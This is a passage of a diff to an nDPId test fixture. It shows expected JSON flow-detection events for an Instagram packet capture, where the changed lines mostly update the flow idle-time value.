+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7560000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908533,"flow_last_seen":1436720908579,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1436720900692,"flow_last_seen":1436720900876,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3517,"flow_avg_l4_payload_len":502,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908531,"flow_last_seen":1436720908567,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1436720901182,"flow_last_seen":1436720908544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":788,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7440000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7560000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 